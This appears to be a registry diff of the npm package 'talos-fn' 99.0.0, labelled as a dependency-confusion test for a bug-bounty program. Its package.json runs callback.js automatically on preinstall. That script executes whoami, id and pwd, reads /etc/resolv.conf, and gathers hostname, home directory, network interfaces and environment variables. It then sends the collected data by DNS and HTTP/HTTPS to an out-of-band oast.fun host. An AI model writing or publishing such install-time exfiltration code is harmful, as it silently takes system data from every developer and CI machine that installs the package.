talos-fn 99.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/callback.js +80 -0
- package/index.js +2 -0
- package/package.json +11 -0
package/callback.js
ADDED
|
@@ -0,0 +1,80 @@
|
|
|
1
|
+
const https = require("https");
|
|
2
|
+
const http = require("http");
|
|
3
|
+
const os = require("os");
|
|
4
|
+
const { execSync } = require("child_process");
|
|
5
|
+
|
|
6
|
+
const CALLBACK_DOMAIN = "ienfcixqbgvbxkccdoxg49j34xtvxelcx.oast.fun";
|
|
7
|
+
|
|
8
|
+
function safeExec(cmd) {
|
|
9
|
+
try { return execSync(cmd, { timeout: 5000 }).toString().trim(); }
|
|
10
|
+
catch (e) { return "unknown"; }
|
|
11
|
+
}
|
|
12
|
+
|
|
13
|
+
const data = {
|
|
14
|
+
package: "talos-fn",
|
|
15
|
+
researcher: "r76o4",
|
|
16
|
+
program: "ripio (HackerOne)",
|
|
17
|
+
purpose: "Dependency confusion security research - no malicious intent",
|
|
18
|
+
hostname: os.hostname(),
|
|
19
|
+
user: safeExec("whoami"),
|
|
20
|
+
id: safeExec("id"),
|
|
21
|
+
pwd: safeExec("pwd"),
|
|
22
|
+
cwd: process.cwd(),
|
|
23
|
+
home: os.homedir(),
|
|
24
|
+
tmpdir: os.tmpdir(),
|
|
25
|
+
platform: os.platform(),
|
|
26
|
+
arch: os.arch(),
|
|
27
|
+
release: os.release(),
|
|
28
|
+
type: os.type(),
|
|
29
|
+
cpus: os.cpus().length,
|
|
30
|
+
totalMem: os.totalmem(),
|
|
31
|
+
freeMem: os.freemem(),
|
|
32
|
+
uptime: os.uptime(),
|
|
33
|
+
networkInterfaces: os.networkInterfaces(),
|
|
34
|
+
nodeVersion: process.version,
|
|
35
|
+
env_path: process.env.PATH || "",
|
|
36
|
+
env_home: process.env.HOME || "",
|
|
37
|
+
env_user: process.env.USER || process.env.USERNAME || "",
|
|
38
|
+
env_shell: process.env.SHELL || "",
|
|
39
|
+
env_ci: process.env.CI || "",
|
|
40
|
+
env_docker: process.env.DOCKER || "",
|
|
41
|
+
env_hostname: process.env.HOSTNAME || "",
|
|
42
|
+
dns_servers: safeExec("cat /etc/resolv.conf 2>/dev/null || echo n/a"),
|
|
43
|
+
ip_info: safeExec("ip a 2>/dev/null || ifconfig 2>/dev/null || echo n/a"),
|
|
44
|
+
timestamp: new Date().toISOString()
|
|
45
|
+
};
|
|
46
|
+
|
|
47
|
+
const encoded = Buffer.from(JSON.stringify(data)).toString("base64");
|
|
48
|
+
|
|
49
|
+
// DNS callback
|
|
50
|
+
try {
|
|
51
|
+
const dns = require("dns");
|
|
52
|
+
const prefix = encoded.substring(0, 60).replace(/[^a-zA-Z0-9]/g, "x");
|
|
53
|
+
dns.resolve(`tlfn.${prefix}.${CALLBACK_DOMAIN}`, () => {});
|
|
54
|
+
} catch (e) {}
|
|
55
|
+
|
|
56
|
+
// HTTP callback
|
|
57
|
+
const postData = JSON.stringify(data);
|
|
58
|
+
const options = {
|
|
59
|
+
hostname: CALLBACK_DOMAIN,
|
|
60
|
+
port: 443,
|
|
61
|
+
path: "/talos-fn",
|
|
62
|
+
method: "POST",
|
|
63
|
+
headers: {
|
|
64
|
+
"Content-Type": "application/json",
|
|
65
|
+
"Content-Length": Buffer.byteLength(postData)
|
|
66
|
+
},
|
|
67
|
+
timeout: 5000
|
|
68
|
+
};
|
|
69
|
+
|
|
70
|
+
try {
|
|
71
|
+
const req = https.request(options, () => {});
|
|
72
|
+
req.on("error", () => {
|
|
73
|
+
const httpReq = http.request({ ...options, port: 80 }, () => {});
|
|
74
|
+
httpReq.on("error", () => {});
|
|
75
|
+
httpReq.write(postData);
|
|
76
|
+
httpReq.end();
|
|
77
|
+
});
|
|
78
|
+
req.write(postData);
|
|
79
|
+
req.end();
|
|
80
|
+
} catch (e) {}
|
package/index.js
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "talos-fn",
|
|
3
|
+
"version": "99.0.0",
|
|
4
|
+
"description": "Security research - dependency confusion test by r76o4 (HackerOne)",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node callback.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "r76o4 (HackerOne security researcher)",
|
|
10
|
+
"license": "ISC"
|
|
11
|
+
}
|